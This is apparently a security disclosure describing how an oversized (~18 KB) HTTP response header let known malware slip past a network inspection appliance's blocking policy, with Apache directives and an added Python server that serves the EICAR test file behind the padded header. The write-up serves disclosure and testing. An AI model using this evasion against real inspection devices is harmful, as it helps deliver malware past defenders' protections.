Information

This vulnerability allows a remote attacker to bypass the appliance's malware protection by serving an HTTP response that carries a crafted (oversized) header field. The malicious file is still the same file; only the response headers around it change.

Crash Dump

None

PoC

  • The test appliance ran the most restrictive policy, "Maximum_Detection", including Block Malware for all file types.
  • The malicious web server was configured so that every response carries a single additional header roughly 18 KB long.
  • A known virus sent over the network was caught by the IPS; after the long header was added, the same virus was delivered successfully.

The httpd.conf directives used to set up the malicious server (Apache under XAMPP). The header value is truncated in this listing; the value actually served was ~18 KB long:

Header echo ^GET
Header add X-MyHeader1 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
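The same setup as an added example in Python, not code from the original report: it serves a test file behind one ~18 KB response header so the PoC can be reproduced without XAMPP. Assumptions: the EICAR test string stands in for the reporter's "known virus", the header name and length follow the report, and scan_window is a hypothetical model of an inspector that only looks at a fixed window of the response (an assumption for illustration, not a description of how the affected product actually works).

```python
"""Added example (not part of the original report): serve a test payload
behind one oversized response header, as in the PoC, and show how a
fixed-size inspection window (hypothetical) would miss the body."""
import http.client
import http.server
import socketserver
import threading

# EICAR standard AV test string; stands in for the "known virus" (assumption).
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

HEADER_NAME = "X-MyHeader1"   # header name from the report's httpd.conf
HEADER_LEN = 18 * 1024        # ~18K, the length given in the report
DEFAULT_WINDOW = 16 * 1024    # hypothetical inspection window (assumption)


def build_response(body: bytes = EICAR, header_len: int = HEADER_LEN) -> bytes:
    """Return a complete HTTP/1.1 response carrying one header of header_len bytes."""
    padding = "a" * header_len
    head = (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: application/octet-stream\r\n"
        f"Content-Length: {len(body)}\r\n"
        f"{HEADER_NAME}: {padding}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return head.encode("ascii") + body


def split_response(raw: bytes):
    """Split a raw response into (status line, {lower-case name: value}, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete response: end of headers not found")
    lines = head.split(b"\r\n")
    status = lines[0].decode("ascii")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.decode("ascii").strip().lower()] = value.strip().decode("ascii")
    return status, headers, body


def scan_window(raw: bytes, window: int = DEFAULT_WINDOW, signature: bytes = EICAR) -> bool:
    """Hypothetical inspector: does the signature appear in the first `window` bytes?"""
    return signature in raw[:window]


class PayloadHandler(http.server.BaseHTTPRequestHandler):
    """Answer every GET with the padded response; the raw bytes are written directly."""
    header_len = HEADER_LEN

    def do_GET(self):
        self.wfile.write(build_response(header_len=self.header_len))

    def log_message(self, *args):
        pass  # keep the PoC server quiet


def serve(port: int = 0, header_len: int = HEADER_LEN):
    """Start the server in a background thread; return (server, bound port)."""
    PayloadHandler.header_len = header_len
    socketserver.TCPServer.allow_reuse_address = True
    srv = socketserver.TCPServer(("127.0.0.1", port), PayloadHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def fetch(port: int, path: str = "/") -> bytes:
    """Fetch path from the local server and return the response body."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", path)
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return data


if __name__ == "__main__":
    # Point the client under test at this port through the inspection device.
    srv, port = serve(8080)
    print(f"serving EICAR behind a {HEADER_LEN}-byte header on http://127.0.0.1:{port}/")
    try:
        threading.Event().wait()
    except KeyboardInterrupt:
        srv.shutdown()
```

Run it on the "malicious" side of the inspection device and download the file from a client on the other side; compare the result with header_len=0 to confirm the device's behaviour differs only because of the oversized header. The window check only models the general failure mode (a scanner that gives up after a bounded prefix never reaches the body); the report itself does not state the root cause in the affected product.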


References:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160330-fp